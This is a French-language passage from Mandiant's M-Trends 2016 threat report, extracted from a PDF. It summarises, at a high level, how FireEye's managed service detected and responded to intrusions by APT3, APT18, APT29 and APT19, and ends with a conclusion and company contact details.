Comme dans le cas de l'opération Clandestine Wolf, FaaS a immédiatement signalé cette activité grâce à la mise en place des moyens de détection de ces groupes, et ce même s'ils utilisaient un autre type d'exploit zero-day. Passée la phase d'intervention immédiate chez les cibles en question, FaaS a alerté l'ensemble de ses clients dans les 24 heures suivant la première tentative, puis leur a transmis des indicateurs à utiliser à leur entière discrétion. Nous avons ainsi pu éviter au moins deux autres intrusions la semaine suivante, lorsqu'APT3 et APT18 ont élargi leur cercle de cibles.

Deux autres intrusions majeures ont été découvertes durant la phase d'utilisation à grande échelle de l'exploit zero-day par APT3 et APT18. Dans le premier cas, APT29 (un groupe de cyberpirates présumé russe) a compromis une entité ayant des intérêts dans l'industrie pétrolière russe. En se dissimulant derrière des connexions SSL normales du client, APT29 a piraté toute une série de sessions RDP, qu'il a ensuite utilisées pour injecter du code malveillant dans l'entreprise, ainsi que pour s'emparer de divers fichiers.

9 Steve Ragan, « Hacking Team Hacked, Attackers Claim 400GB in Dumped Data », 5 juillet 2015, CSO, http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html

La seconde intrusion majeure a été menée par APT19 (un groupe vraisemblablement basé en Chine) à l'encontre d'un industriel. Dans un premier temps, APT19 a utilisé une backdoor pour se propager dans l'environnement, puis a collecté les données de près de 6 000 comptes utilisateur valides. Après avoir utilisé ces comptes pour obtenir un accès légitime, le groupe a cherché à échapper aux analyses forensiques en effaçant toute trace de l'accès initial. L'intervention de FaaS a été immédiate, grâce à sa parfaite connaissance des méthodologies de détection des accès légitimes et aux renseignements sur APT19 fournis par l'équipe FireEye Threat Intelligence.

À court terme, FaaS s'attend à un accroissement de ses activités de détection et d'intervention, tant en termes de volume que de complexité. Nous assistons chaque année à une intensification de l'activité des acteurs connus, ainsi qu'à l'émergence de menaces toujours plus nombreuses. Par ailleurs, les clients déploient des technologies toujours plus variées sur des sites aux quatre coins du monde. Dans ce contexte, l'éventail des technologies de détection doit lui aussi s'élargir pour garantir une sécurité efficace. Pour FaaS, nos clients ont tout à gagner d'un dispositif d'intervention performant au sein de cet environnement opérationnel en constante évolution, ce grâce à l'intégration étroite de nos services aux opérations d'intervention sur incidents de Mandiant et à une plate-forme FireEye unifiée.

PREMIÈRES 24 HEURES

Passation du relais

Découverte de la backdoor

16h13

Surveillance et apprentissage

Signalement de la compromission et recommandations

Identification du vecteur d'attaque initial

23h59

16h3720h54

18h02

http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html

http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html


D'année en année, les attaquants conçoivent de nouvelles techniques innovantes en vue de mener à bien leurs activités malveillantes. Les équipes de sécurité ne sont pas en reste, puisqu'elles ne cessent d'affiner leurs connaissances et d'étoffer leur arsenal de défense pour contrer ces techniques. En outre, l'évolution rapide des technologies sur lesquelles nous nous appuyons soulève la question de leur protection lorsqu'il n'existe pas de précédent en matière de sécurité.

Cette éternelle course-poursuite confère à notre secteur un caractère unique et contribue à sa complexité, car une sécurité « acceptable » est clairement insuffisante. Certes, la durée moyenne d'une compromission a diminué de manière régulière depuis que nous avons commencé à tenir des statistiques (soit cinq ans), mais 146 jours, c'est encore beaucoup trop, comme nous l'avons démontré dans la section consacrée aux simulations d'attaque.

Les entreprises compromises ne peuvent plus se contenter de déterminer quelles données ont été dérobées, comment l'attaquant s'est infiltré et comment remédier à la situation. En effet, elles doivent aujourd'hui faire face au regard critique de l'opinion publique, à des enquêtes judiciaires et à des actions en justice comme jamais auparavant. Les compromissions touchent également les citoyens ordinaires, si bien que la discussion change de registre : elle n'est plus exclusivement réservée au cercle fermé de la sécurité, mais s'étend désormais à toutes les catégories de collaborateurs.

Face à des menaces en évolution constante, les dispositifs de sécurité doivent se renforcer au même rythme. Pour cela, ils doivent s'inscrire dans un processus d'amélioration permanente, couplé à l'implémentation de mesures de protection qui vont au-delà des meilleures pratiques, pour assurer une protection efficace contre les activités des attaquants. Dans cette optique, vous devrez collaborer avec des entreprises spécialisées dans la défense contre les menaces spécifiques qui pèsent sur votre activité.

CONCLUSION

Pour en savoir plus sur Mandiant, consultez la page suivante de notre site : www.fireeye.fr/services.html

FireEye, France | 4, place de la Défense, Paris La Défense Cedex 92974 | +33 1 58 58 01 76 | [email protected] | www.FireEye.fr

FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | +1 408 321 6300 | www.FireEye.com

www.FireEye.fr

© 2016 FireEye, Inc. Tous droits réservés. FireEye est une marque déposée de FireEye, Inc. Tous les autres noms de marques, de produits ou de services sont ou peuvent être des marques commerciales ou des marques de service de leurs propriétaires respectifs. SP.MTRENDS.FR-FR.022016

https://www.fireeye.com/services.html

mailto:france%40FireEye.com?subject=

https://www.FireEye.fr

http://www.FireEye.com

MANDIANT CONSULTING M-TRENDS 2016 - Bitpipedocs.media.bitpipe.com/.../rpt-mtrends-2016_FR.pdf · NP...

Documents

Transcript of MANDIANT CONSULTING M-TRENDS 2016 - Bitpipedocs.media.bitpipe.com/.../rpt-mtrends-2016_FR.pdf · NP...